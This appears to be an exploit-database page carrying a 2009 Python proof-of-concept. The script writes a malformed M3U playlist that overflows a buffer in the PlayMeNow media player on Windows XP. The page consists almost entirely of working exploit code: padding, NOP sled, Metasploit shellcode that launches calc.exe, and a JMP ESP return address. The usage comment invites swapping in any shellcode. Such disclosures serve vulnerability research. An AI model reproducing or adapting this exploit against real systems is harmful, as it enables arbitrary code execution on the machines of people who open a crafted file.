PlayMeNow Malformed M3U Playlist WinXP Universal BOF

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PlayMeNow Malformed M3U Playlist WinXP Universal BOF
# Published : 2009-12-19
# Author : loneferret
# Previous Title : PHP 5.2.12/5.3.1 symlink() open_basedir bypass
# Next Title : Mozilla Firefox Location Bar Spoofing Vulnerability

#!/usr/bin/python

# Vulnerability:        	PlayMeNow Malformed M3U Playlist WinXP Universal BoF
# Product:			PlayMeNow - media player.
# Versions affected:     	Tested with 7.3 and 7.4
# Tested on:              	Windows XP Pro SP2/3 & Home SP3
# Author:                 	loneferret
# Original Author:    	Gr33nG0bL1n
# Reference:			http://www.exploit-db.com/exploits/10556
# Date: 19/12/2009
# Usage: Just choose your shellcode and open the created file(PlayMeNow_expl.m3u) with PlayMeNow.

# The offset is 1040, but the return address used brings us into it. So the shellcode is part of our
# offset buffer. Also, yes the return address does contain x00. If you want to put in a bigger payload
# play around with the first & second set of As and those nops.

buffer = "x41" * 465
buffer += "x90" * 110

#win32_exec -  
#EXITFUNC=thread 
#CMD=calc.exe Size=164 Encoder=PexFnstenvSub 
#http://metasploit.com */
buffer +=("x33xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xc4"
"x5bx35x61x83xebxfcxe2xf4x38xb3x71x61xc4x5bxbex24"
"xf8xd0x49x64xbcx5axdaxeax8bx43xbex3exe4x5axdex28"
"x4fx6fxbex60x2ax6axf5xf8x68xdfxf5x15xc3x9axffx6c"
"xc5x99xdex95xffx0fx11x65xb1xbexbex3exe0x5axdex07"
"x4fx57x7exeax9bx47x34x8ax4fx47xbex60x2fxd2x69x45"
"xc0x98x04xa1xa0xd0x75x51x41x9bx4dx6dx4fx1bx39xea"
"xb4x47x98xeaxacx53xdex68x4fxdbx85x61xc4x5bxbex09"
"xf8x04x04x97xa4x0dxbcx99x47x9bx4ex31xacxb4xfbx81"
"xa4x33xadx9fx4ex55x62x9ex23x38x54x0dxa7x75x50x19"
"xa1x5bx35x61")

buffer += "x41" * 301		# end of our 1040 byte
buffer += "x8cx92x5bx00" 	# 0x005B928C JMP ESP @ autorun.exe
buffer += "xCC" * 2800		# junk

file=open('playmenow.m3u','w')
file.write(buffer)				# write file
file.close()